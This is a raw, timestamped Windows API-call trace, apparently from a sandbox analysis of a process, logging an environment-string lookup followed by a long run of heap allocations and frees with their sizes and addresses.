GetEnvironmentStringsW () returned 0x568b70* [0288.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0288.356] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x4e6) returned 0x569550 [0288.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x569550, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0288.356] FreeEnvironmentStringsW (penv=0x568b70) returned 1 [0288.356] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x118) returned 0x559cb0 [0288.356] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1f) returned 0x55b220 [0288.356] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x2e) returned 0x55e6c0 [0288.356] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x31) returned 0x55e1c0 [0288.356] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3c) returned 0x5611c0 [0288.356] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x31) returned 0x55e380 [0288.356] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x14) returned 0x5544c0 [0288.356] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x24) returned 0x55b400 [0288.356] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xd) returned 0x553fb0 [0288.356] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1d) returned 0x55b580 [0288.356] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x31) returned 0x55e3c0 [0288.356] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x15) returned 0x5594a0 [0288.356] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x17) returned 0x553cb0 [0288.356] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xe) returned 0x5525f0 [0288.356] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x69) returned 0x553eb0 [0288.356] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3e) returned 0x560f40 [0288.356] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1d) returned 0x55b520 [0288.357] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x48) returned 0x5609f0 [0288.357] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x12) returned 0x555660 [0288.357] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x18) returned 0x555680 [0288.357] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1b) returned 0x55b310 [0288.357] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1e) returned 0x55b040 [0288.357] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x29) returned 0x55e540 [0288.357] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1e) returned 0x55b1c0 [0288.357] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x6b) returned 0x55b5c0 [0288.357] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x17) returned 0x554810 [0288.357] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xf) returned 0x554830 [0288.357] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x16) returned 0x554070 [0288.357] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x2a) returned 0x55e640 [0288.357] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x29) returned 0x55e040 [0288.357] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x12) returned 0x554090 [0288.358] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x21) returned 0x55ae90 [0288.358] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x16) returned 0x569c10 [0288.358] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x22) returned 0x55af50 [0288.358] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x12) returned 0x569a90 [0288.358] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x569550 | out: hHeap=0x550000) returned 1 [0288.359] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xa3a7) returned 0x569e50 [0288.361] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x55af80 [0288.361] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xa3a7) returned 0x574200 [0288.495] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x569e50 | out: hHeap=0x550000) returned 1 [0288.495] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xfef7) returned 0x57e5b0 [0288.499] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x5607c0 [0288.499] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xfef7) returned 0x58e4b0 [0288.501] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55af80 | out: hHeap=0x550000) returned 1 [0288.502] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x57e5b0 | out: hHeap=0x550000) returned 1 [0288.503] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x450) returned 0x568b70 [0288.503] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x450) returned 0x568fd0 [0288.503] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568b70 | out: hHeap=0x550000) returned 1 [0288.503] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1ea7) returned 0x569e50 [0288.503] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xf40) returned 0x59e3b0 [0288.504] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x7a0) returned 0x59f300 [0288.504] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x569e50 | out: hHeap=0x550000) returned 1 [0288.504] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59e3b0 | out: hHeap=0x550000) returned 1 [0288.504] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xbf0) returned 0x59e3b0 [0288.504] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568fd0 | out: hHeap=0x550000) returned 1 [0288.504] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59f300 | out: hHeap=0x550000) returned 1 [0288.504] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x640) returned 0x568b70 [0288.504] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1247) returned 0x569e50 [0288.504] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59e3b0 | out: hHeap=0x550000) returned 1 [0288.504] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568b70 | out: hHeap=0x550000) returned 1 [0288.504] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x520) returned 0x568b70 [0288.505] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1b56) returned 0x59e3b0 [0288.505] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x569e50 | out: hHeap=0x550000) returned 1 [0288.505] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568b70 | out: hHeap=0x550000) returned 1 [0288.505] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8a0) returned 0x568b70 [0288.505] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x28ed) returned 0x569e50 [0288.505] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59e3b0 | out: hHeap=0x550000) returned 1 [0288.505] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568b70 | out: hHeap=0x550000) returned 1 [0288.505] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x550) returned 0x568b70 [0288.505] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568b70 | out: hHeap=0x550000) returned 1 [0288.505] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2537) returned 0x56c750 [0288.505] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x12b7) returned 0x59e3b0 [0288.506] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x950) returned 0x59f670 [0288.506] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56c750 | out: hHeap=0x550000) returned 1 [0288.506] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59e3b0 | out: hHeap=0x550000) returned 1 [0288.506] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x3d4f) returned 0x56c750 [0288.506] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x569e50 | out: hHeap=0x550000) returned 1 [0288.506] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59f670 | out: hHeap=0x550000) returned 1 [0288.506] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2377) returned 0x569e50 [0288.507] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x11d7) returned 0x59e3b0 [0288.507] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8e0) returned 0x59f590 [0288.507] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x569e50 | out: hHeap=0x550000) returned 1 [0288.507] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59e3b0 | out: hHeap=0x550000) returned 1 [0288.507] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59f590 | out: hHeap=0x550000) returned 1 [0288.507] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x5b0) returned 0x568b70 [0288.507] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568b70 | out: hHeap=0x550000) returned 1 [0288.507] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x640) returned 0x568b70 [0288.507] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x5be2) returned 0x57e5b0 [0288.508] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56c750 | out: hHeap=0x550000) returned 1 [0288.508] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568b70 | out: hHeap=0x550000) returned 1 [0288.508] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x890) returned 0x568b70 [0288.509] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568b70 | out: hHeap=0x550000) returned 1 [0288.509] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xac0) returned 0x568b70 [0288.509] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568b70 | out: hHeap=0x550000) returned 1 [0288.509] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x55af80 [0288.509] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x960) returned 0x568b70 [0288.509] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x960) returned 0x59e3b0 [0288.509] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568b70 | out: hHeap=0x550000) returned 1 [0288.509] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x460) returned 0x568b70 [0288.509] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xe0f) returned 0x59ed20 [0288.509] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59e3b0 | out: hHeap=0x550000) returned 1 [0288.509] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568b70 | out: hHeap=0x550000) returned 1 [0288.509] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1c17) returned 0x5841a0 [0288.509] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xe00) returned 0x568b70 [0288.510] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x700) returned 0x59e3b0 [0288.510] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5841a0 | out: hHeap=0x550000) returned 1 [0288.510] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568b70 | out: hHeap=0x550000) returned 1 [0288.510] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x153d) returned 0x5841a0 [0288.510] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59ed20 | out: hHeap=0x550000) returned 1 [0288.510] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59e3b0 | out: hHeap=0x550000) returned 1 [0288.510] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2277) returned 0x5856f0 [0288.511] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1157) returned 0x59e3b0 [0288.511] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8a0) returned 0x59f510 [0288.511] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5856f0 | out: hHeap=0x550000) returned 1 [0288.511] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59e3b0 | out: hHeap=0x550000) returned 1 [0288.511] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1fc7) returned 0x5856f0 [0288.511] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5841a0 | out: hHeap=0x550000) returned 1 [0288.512] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59f510 | out: hHeap=0x550000) returned 1 [0288.512] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1657) returned 0x59e3b0 [0288.512] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xb20) returned 0x568b70 [0288.512] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x590) returned 0x59fa10 [0288.512] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59e3b0 | out: hHeap=0x550000) returned 1 [0288.512] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568b70 | out: hHeap=0x550000) returned 1 [0288.512] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2f96) returned 0x5876c0 [0288.512] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5856f0 | out: hHeap=0x550000) returned 1 [0288.513] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59fa10 | out: hHeap=0x550000) returned 1 [0288.513] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2b47) returned 0x5841a0 [0288.513] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x15b7) returned 0x59e3b0 [0288.513] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xad0) returned 0x568b70 [0288.513] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5841a0 | out: hHeap=0x550000) returned 1 [0288.513] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59e3b0 | out: hHeap=0x550000) returned 1 [0288.513] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568b70 | out: hHeap=0x550000) returned 1 [0288.513] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x2697) returned 0x5841a0 [0288.514] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1367) returned 0x59e3b0 [0288.514] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x9a0) returned 0x586840 [0288.515] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5841a0 | out: hHeap=0x550000) returned 1 [0288.515] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59e3b0 | out: hHeap=0x550000) returned 1 [0288.515] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x474d) returned 0x569e50 [0288.515] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5876c0 | out: hHeap=0x550000) returned 1 [0288.515] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x586840 | out: hHeap=0x550000) returned 1 [0288.515] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x920) returned 0x568b70 [0288.515] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568b70 | out: hHeap=0x550000) returned 1 [0288.515] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1b47) returned 0x59e3b0 [0288.515] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xd90) returned 0x568b70 [0288.516] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6d0) returned 0x56e5b0 [0288.516] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59e3b0 | out: hHeap=0x550000) returned 1 [0288.516] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568b70 | out: hHeap=0x550000) returned 1 [0288.516] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x56e5b0 | out: hHeap=0x550000) returned 1 [0288.516] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x5d0) returned 0x568b70 [0288.516] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6adf) returned 0x5841a0 [0288.516] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x569e50 | out: hHeap=0x550000) returned 1 [0288.516] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568b70 | out: hHeap=0x550000) returned 1 [0288.516] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1887) returned 0x59e3b0 [0288.517] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xc30) returned 0x568b70 [0288.517] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x620) returned 0x58ac90 [0288.517] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59e3b0 | out: hHeap=0x550000) returned 1 [0288.517] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568b70 | out: hHeap=0x550000) returned 1 [0288.517] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x58ac90 | out: hHeap=0x550000) returned 1 [0288.518] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8f0) returned 0x568b70 [0288.518] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x480) returned 0x569470 [0288.518] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x240) returned 0x55c460 [0288.518] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x568b70 | out: hHeap=0x550000) returned 1 [0288.518] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x569470 | out: hHeap=0x550000) returned 1 [0288.518] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55c460 | out: hHeap=0x550000) returned 1 [0288.518] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x561260 [0288.518] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55af80 | out: hHeap=0x550000) returned 1 [0288.518] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x57e5b0 | out: hHeap=0x550000) returned 1 [0288.519] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5841a0 | out: hHeap=0x550000) returned 1 [0288.520] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x561260 | out: hHeap=0x550000) returned 1 [0288.520] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x9900) returned 0x569e50 [0288.521] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1bf0) returned 0x59e3b0 [0288.524] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59e3b0 | out: hHeap=0x550000) returned 1 [0288.524] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x9937) returned 0x57e5b0 [0288.526] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x569e50 | out: hHeap=0x550000) returned 1 [0288.526] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x55af80 [0288.526] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x9900) returned 0x569e50 [0288.526] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1bf0) returned 0x59e3b0 [0288.527] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x59e3b0 | out: hHeap=0x550000) returned 1 [0288.527] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x9937) returned 0x59e3b0 [0288.528] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x569e50 | out: hHeap=0x550000) returned 1 [0288.528] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x40) returned 0x560b30 [0288.528] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55af80 | out: hHeap=0x550000) returned 1 [0288.528] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x574200 | out: hHeap=0x550000) returned 1 [0288.673] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x58e4b0 | out: hHeap=0x550000) returned 1 [0288.674] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5607c0 | out: hHeap=0x550000) returned 1 [0288.674] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x569e50 [0288.674] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x587ef0 [0288.674] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x8) returned 0x554580 [0288.674] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x5a7cf0 [0288.676] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x10) returned 0x569db0 [0288.676] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x554580 | out: hHeap=0x550000) returned 1 [0288.676] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x5baf00 [0288.677] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x18) returned 0x569d10 [0288.677] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x569db0 | out: hHeap=0x550000) returned 1 [0288.677] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x5ce110 [0288.678] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x20) returned 0x55b250 [0288.678] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x569d10 | out: hHeap=0x550000) returned 1 [0288.678] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x5e1320 [0288.679] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x30) returned 0x55e280 [0288.679] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55b250 | out: hHeap=0x550000) returned 1 [0288.679] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x5f4530 [0288.680] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x607740 [0288.680] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x48) returned 0x560f90 [0288.680] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55e280 | out: hHeap=0x550000) returned 1 [0288.681] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x61a950 [0288.681] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x62db60 [0288.682] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x1f70080 [0288.683] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x68) returned 0x55b640 [0288.683] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x560f90 | out: hHeap=0x550000) returned 1 [0288.683] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x1f83290 [0288.684] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x1f964a0 [0288.685] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x1fa96b0 [0288.686] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x1fbc8c0 [0288.686] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x98) returned 0x5588a0 [0288.686] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55b640 | out: hHeap=0x550000) returned 1 [0288.686] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x1fcfad0 [0288.687] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x1fe2ce0 [0288.687] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x1ff5ef0 [0288.688] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2009100 [0288.689] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x201c310 [0288.689] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x202f520 [0288.690] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xe0) returned 0x554c50 [0288.690] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5588a0 | out: hHeap=0x550000) returned 1 [0288.690] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2042730 [0288.691] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2070080 [0288.692] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2083290 [0288.693] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x20964a0 [0288.695] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x20a96b0 [0288.695] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x20bc8c0 [0288.696] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x20cfad0 [0288.697] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x20e2ce0 [0288.697] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x20f5ef0 [0288.698] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x150) returned 0x55ac50 [0288.698] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x554c50 | out: hHeap=0x550000) returned 1 [0288.698] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2109100 [0288.700] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x211c310 [0288.700] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x212f520 [0288.701] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2142730 [0288.701] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2155940 [0288.702] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2168b50 [0288.702] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x217bd60 [0288.703] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x218ef70 [0288.703] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x21a2180 [0288.704] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x21b5390 [0288.705] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x21c85a0 [0288.705] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x21db7b0 [0288.706] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x21ee9c0 [0288.707] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2201bd0 [0288.707] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1f8) returned 0x55c460 [0288.707] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x55ac50 | out: hHeap=0x550000) returned 1 [0288.707] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2214de0 [0288.708] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x13200) returned 0x2227ff0 